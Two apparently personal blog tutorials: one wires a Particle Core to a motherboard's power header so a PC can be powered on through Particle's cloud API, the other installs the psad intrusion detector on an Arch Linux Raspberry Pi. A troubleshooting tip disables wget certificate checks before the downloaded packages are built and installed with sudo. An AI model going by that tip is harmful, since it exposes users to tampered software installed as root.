<p>This project takes under an hour and is a good little assignment for anyone looking into learning some basic hardware hacking with useful applications.</p>
<h2>The Scenario</h2>
<p>I have a computer in my apartment which I mostly use for playing video games, but sometimes I like to access it remotely over the internet to do server tasks for me. The problem though is that gaming desktops use a lot of <a href="http://hardware.slashdot.org/story/15/09/01/1318231/">electricity</a> when they're running. So running the computer 24/7 would be too wasteful.</p>
<p>Instead, I want to be able to turn on my computer from anywhere on the internet, whenever I desire to use it remotely.</p>
<p>This can be achieved using "wake-on-LAN" (<a href="https://en.wikipedia.org/wiki/Wake-on-LAN">WoL</a>), but unfortunately my desktop's motherboard is too old to support this. So instead, I decided to connect a <a href="https://store.particle.io/">Particle Core</a> to my desktop's motherboard so it can turn on the computer for me!</p>
<h2>Particle</h2>
<p><img alt="particle" src="https://carteryagemann.com/images/particle-core.jpg"></p>
<p>For this hack, I used a Particle Core because that's what I had lying around, but a Photon would work just as well and is only $19. For the sake of brevity, I'm going to skip the details of how to set up and configure your Particle device. If this is your first time using Particle, they have a tutorial <a href="https://docs.particle.io/guide/getting-started/start/core/#getting-to-know-you">here</a>.</p>
<h2>ATX Motherboards</h2>
<p>My motherboard is an ATX board, but the process should be similar for other common motherboard form factors.</p>
<p>So how does pushing the power button turn on your computer? Your motherboard has two pins on it which are used to turn on the computer:</p>
<p><img alt="pin diagram" src="https://carteryagemann.com/images/pin-diagram.jpg"></p>
<p>One of the two pins (labeled Power Switch in the above diagram) is held at 3.3V to 5V and the other pin is ground. When you press the power button, the circuit is completed, allowing the charged pin to discharge into the ground pin. This drop in voltage is detected by the motherboard and serves as the signal that it's time to power up.</p>
<p>For our project, we're going to do the same thing, only instead of using a button, we're going to use a Particle.</p>
<h2>Wiring the Particle</h2>
<p>The circuit is pretty simple and with the right supplies you won't even need to solder anything! Once you've identified which pins on your motherboard are for the power, you can use the simple diagram below to wire everything up. All we're going to do is run a wire from one of the digital pins on the Particle to one of the power pins and then another wire from the Particle's ground to the other pin. I also added a small 220 ohm resistor to the ground wire just to make sure the Particle doesn't get fried.</p>
<p><img alt="schematic" src="https://carteryagemann.com/images/schematic.jpg">
<img alt="particle wired to motherboard labeled" src="https://carteryagemann.com/images/desktop-interals-labled.jpg"></p>
<h2>Software</h2>
<p>One of the nice things about Particle's boards is that they all communicate with Particle's cloud. This allows us to write our code through Particle's web interface and then the cloud can remotely flash the Particle. No need to open the case!</p>
<p>The following is the source code for our Particle:</p>
<div class="highlight"><pre><span></span><span class="cm">/**</span>
<span class="cm"> * Mobo Power - Copyright 2015 Carter Yagemann</span>
<span class="cm"> * </span>
<span class="cm"> * This program allows a core to power on a motherboard over the internet!</span>
<span class="cm"> * </span>
<span class="cm"> * This program is free software: you can redistribute it and/or modify</span>
<span class="cm"> * it under the terms of the GNU General Public License as published by</span>
<span class="cm"> * the Free Software Foundation, either version 3 of the License, or</span>
<span class="cm"> * (at your option) any later version.</span>
<span class="cm"> * </span>
<span class="cm"> * This program is distributed in the hope that it will be useful,</span>
<span class="cm"> * but WITHOUT ANY WARRANTY; without even the implied warranty of</span>
<span class="cm"> * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the</span>
<span class="cm"> * GNU General Public License for more details.</span>
<span class="cm"> */</span>
<span class="kt">void</span> <span class="nf">setup</span><span class="p">()</span> <span class="p">{</span>
<span class="c1">// D0 will control the motherboard</span>
<span class="n">pinMode</span><span class="p">(</span><span class="n">D0</span><span class="p">,</span> <span class="n">OUTPUT</span><span class="p">);</span>
<span class="c1">// ATX boards maintain high power on their power pin and then ground</span>
<span class="c1">// shortly to signal that the motherboard should power up. So we</span>
<span class="c1">// normally want the pin to be in the high state.</span>
<span class="n">digitalWrite</span><span class="p">(</span><span class="n">D0</span><span class="p">,</span> <span class="n">HIGH</span><span class="p">);</span>
<span class="c1">// Register a function with Particle&#39;s cloud service so we can invoke</span>
<span class="c1">// the core from over the internet.</span>
<span class="n">Spark</span><span class="p">.</span><span class="n">function</span><span class="p">(</span><span class="s">&quot;poweron&quot;</span><span class="p">,</span> <span class="n">powerOn</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">loop</span><span class="p">()</span> <span class="p">{</span>
<span class="c1">// Nothing to do</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">powerOn</span><span class="p">(</span><span class="n">String</span> <span class="n">command</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// Switch the pin to low for half a second so the motherboard knows</span>
<span class="c1">// it&#39;s time to turn on.</span>
<span class="n">digitalWrite</span><span class="p">(</span><span class="n">D0</span><span class="p">,</span> <span class="n">LOW</span><span class="p">);</span>
<span class="n">delay</span><span class="p">(</span><span class="mi">500</span><span class="p">);</span>
<span class="n">digitalWrite</span><span class="p">(</span><span class="n">D0</span><span class="p">,</span> <span class="n">HIGH</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
</pre></div>
<p>Once we've flashed our Particle with this software, all that's left is to use it!</p>
<h2>Pressing the button... from anywhere in the world</h2>
<p>You can communicate with your Particle through their REST API. The simplest way to do this is with a curl command:</p>
<div class="highlight"><pre><span></span>curl https://api.particle.io/v1/devices/device_id/poweron -d <span class="nv">access_token</span><span class="o">=</span>access_token
</pre></div>
<p>Where <code>device_id</code> is the ID for your Particle and the <code>access_token</code> is your account token.</p>
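<p>As a convenience, the call can be wrapped in a tiny shell helper. The function names here are my own, not part of Particle's tooling, and the actual request of course requires network access and valid credentials:</p>

```shell
# Build the Particle cloud URL for a given device ID and cloud function.
particle_url() {
    echo "https://api.particle.io/v1/devices/$1/$2"
}

# Invoke the "poweron" function registered in the firmware above.
# Usage: power_on <device_id> <access_token>
power_on() {
    curl -s "$(particle_url "$1" poweron)" -d "access_token=$2"
}

particle_url "device_id" "poweron"
```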
<p>And that's it! Hopefully you've found this tutorial to be useful. If you have any questions or comments, you can contact me via any of the means listed on my <a href="https://carteryagemann.com/index.html">homepage</a>.</p>
<p><em>Happy hacking!</em></p>Installing psad on Raspberry Pi Running Arch Linux2015-02-13T11:00:00-05:002015-02-13T11:00:00-05:00Carter Yagemanntag:carteryagemann.com,2015-02-13:/psad-on-pi.html<p>I've been fooling around with IDS and specifically psad and I thought it would be fun to try installing psad on my raspberry pi. Little did I know, installing psad on an ARM processor running Arch Linux with systemd is not a simple process. It took me great effort to …</p><p>I've been fooling around with IDS and specifically psad and I thought it would be fun to try installing psad on my raspberry pi. Little did I know, installing psad on an ARM processor running Arch Linux with systemd is not a simple process. It took me great effort to get psad running correctly, so I thought I'd take the time to document my struggles in the hopes that this will be useful to someone else.</p>
<h1>What is psad?</h1>
<p>psad is an intrusion detection system (IDS) which works by monitoring logs generated by iptables (a network firewall common to most Linux distros). You can find more information on psad <a href="http://cipherdyne.org/psad/">here</a>.</p>
<h1>Scope of this document</h1>
<p>The focus of this document is on challenges I ran into while trying to get psad to install and run on a raspberry pi, and my solutions. This document does not cover how to configure or use psad. It <em>does</em> cover things which I had to take into consideration due to the raspberry pi CPU being an ARM processor and due to my OS being Arch Linux with systemd.</p>
<h1>Contact</h1>
<p>Many of my solutions are hacks and probably suboptimal hacks at that. If you see anything wrong with this guide or have better solutions to the problems I covered here, feel free to contact me at <a href="mailto:cmyagema@syr.edu">cmyagema@syr.edu</a>.</p>
<h1>Other Useful Resources</h1>
<ul>
<li><a href="http://cipherdyne.org/psad/">psad homepage</a></li>
<li>An installation guide that helped me <em>(Edit: This blog no longer exists)</em></li>
<li><a href="https://www.digitalocean.com/community/tutorials/how-to-use-psad-to-detect-network-intrusion-attempts-on-an-ubuntu-vps">A guide on configuring psad</a></li>
</ul>
<h1>Installing psad for ARM from AUR</h1>
<p>Since psad is not included in the main Arch Linux repositories, it has to be downloaded, compiled, and built from the AUR repository.</p>
<p>First, create a file (I will name it "list.txt") and write in it the following URLs:</p>
<div class="highlight"><pre><span></span>https://aur.archlinux.org/packages/pe/perl-unix-syslog/perl-unix-syslog.tar.gz
https://aur.archlinux.org/packages/pe/perl-iptables-parse/perl-iptables-parse.tar.gz
https://aur.archlinux.org/packages/pe/perl-iptables-chainmgr/perl-iptables-chainmgr.tar.gz
https://aur.archlinux.org/packages/ps/psad/psad.tar.gz
</pre></div>
<p>These are the tarballs which we will need from AUR.</p>
<p>Next, run the following commands to untar the tarballs, build them, and install them:</p>
<div class="highlight"><pre><span></span>cat list.txt <span class="p">|</span> xargs wget
tar xzvf perl-iptables-parse.tar.gz
<span class="nb">cd</span> perl-iptables-parse
makepkg -Acs
sudo pacman -U perl-iptables-parse-1.1-2-any.pkg.tar.xz
<span class="nb">cd</span> ..
tar xzvf perl-unix-syslog.tar.gz
<span class="nb">cd</span> perl-unix-syslog
makepkg -Acs
sudo pacman -U perl-unix-syslog-1.1-4-any.pkg.tar.xz
<span class="nb">cd</span> ..
tar xzvf perl-iptables-chainmgr.tar.gz
<span class="nb">cd</span> perl-iptables-chainmgr
makepkg -Acs
sudo pacman -U perl-iptables-chainmgr-1.2-2-any.pkg.tar.xz
<span class="nb">cd</span> ..
tar xzvf psad.tar.gz
<span class="nb">cd</span> psad
makepkg -Acs
sudo pacman -U --force psad-2.2.3-1-armv6h.pkg.tar.xz
</pre></div>
<p>Now if you are lucky, unlike me, this should be all you have to do. However, I ran into many additional problems, which is what I will focus on in the following sections.</p>
<h1>Configuration</h1>
<p>As I mentioned earlier, I am not going to cover how to configure psad. There is, however, one setting which I will mention because it's different from other systems. Namely, because of how systemd logs, the syslog data is in an unusual location.</p>
<p>To fix this setting, list the contents of your <code>/var/log/journal/</code> directory. You should see a directory whose name is a long string of letters and numbers (the machine ID), and inside that directory should be a file called <code>system.journal</code>. I found that this is the file which psad has to be pointed to.</p>
<p>Once you have identified this path, open <code>/etc/psad/psad.conf</code> and point <code>IPT_SYSLOG_FILE</code> to this file. In my case, this means:</p>
<div class="highlight"><pre><span></span>IPT_SYSLOG_FILE /var/log/journal/37ed4fd73b0c416886710f1c8ffa083b/system.journal;
</pre></div>
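<p>The machine-ID directory name differs on every system, so rather than copying it by hand you can locate the file with a small helper. This is a sketch of my own (<code>find_journal</code> is not part of psad); on a real Arch system you would call it with <code>/var/log/journal</code>:</p>

```shell
# Print the first system.journal found under the given journal root,
# e.g. find_journal /var/log/journal
find_journal() {
    ls "$1"/*/system.journal 2>/dev/null | head -n 1
}
```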
<p>If you want to try port scanning yourself or in general test your psad installation, be mindful that the raspberry pi has very limited computing resources, so it might take a while for your test to reflect in psad's status.</p>
<h2>Troubleshooting</h2>
<h3>wget fails due to certificates</h3>
<p>This one is easy, just replace <code>cat list.txt | xargs wget</code> with <code>cat list.txt | xargs wget --no-check-certificate</code>.</p>
<h3>makepkg fails and returns a build error</h3>
<p>Try rebooting the raspberry pi. Sometimes not having enough memory can cause the build to fail.</p>
<h3>psad is installed, but when I run <code>sudo psad -S</code> I get the message <code>pid file [...]/psadwatchd.pid does not exist</code></h3>
<p>If you're seeing this towards the top of the output for <code>sudo psad -S</code>:</p>
<div class="highlight"><pre><span></span>[-] psad: pid file /var/run/psad/psadwatchd.pid does not exist for psadwatchd on HOSTNAME
</pre></div>
<p>Then you probably have the same problem I had.</p>
<p>This was the most painful of the problems I ran into, and it was the one big enough to convince me to write this document. If I hadn't run into this issue (and the systemd logging issue), I wouldn't have bothered writing any of this. The problem in my case was that "psadwatchd" wasn't starting for some reason when "psad" started. To confirm this as the source of the problem, run:</p>
<div class="highlight"><pre><span></span>ps -A | grep &quot;psad&quot;
</pre></div>
<p>If you only see one process called "psad" and no "psadwatchd", then you're having the same problem as me.</p>
<p>The solution I came up with for this is very much a hack, but it works decently. Basically, I got around the problem by making a separate service for psadwatchd.</p>
<p>First, create a new file: <code>/etc/systemd/system/psadwatchd.service</code></p>
<p>In this file, write:</p>
<div class="highlight"><pre><span></span><span class="k">[Unit]</span>
<span class="na">Description</span><span class="o">=</span><span class="s">Port scan attack detector daemon</span>
<span class="na">After</span><span class="o">=</span><span class="s">psad.service</span>
<span class="k">[Service]</span>
<span class="na">ExecStart</span><span class="o">=</span><span class="s">/usr/sbin/psadwatchd</span>
<span class="na">Type</span><span class="o">=</span><span class="s">oneshot</span>
<span class="na">RemainAfterExit</span><span class="o">=</span><span class="s">yes</span>
<span class="k">[Install]</span>
<span class="na">WantedBy</span><span class="o">=</span><span class="s">multi-user.target</span>
</pre></div>
<p>Next, confirm that you wrote this service file correctly by starting it in systemctl:</p>
<div class="highlight"><pre><span></span>sudo systemctl start psadwatchd
</pre></div>
<p>If all went as it should, you should be able to execute the following two commands:</p>
<div class="highlight"><pre><span></span>ps -A <span class="p">|</span> grep <span class="s2">&quot;psad&quot;</span>
sudo psad -S
</pre></div>
<p>The first command should return both a <code>psad</code> process and a <code>psadwatchd</code> process. The second command should now show information on psadwatchd and no longer show an error about missing PID files.</p>
<p>Now that you've made a working psadwatchd service file, add this new service to systemd's startup list:</p>
<div class="highlight"><pre><span></span>sudo systemctl <span class="nb">enable</span> psadwatchd
</pre></div>
<p>And that should be it (hopefully).</p>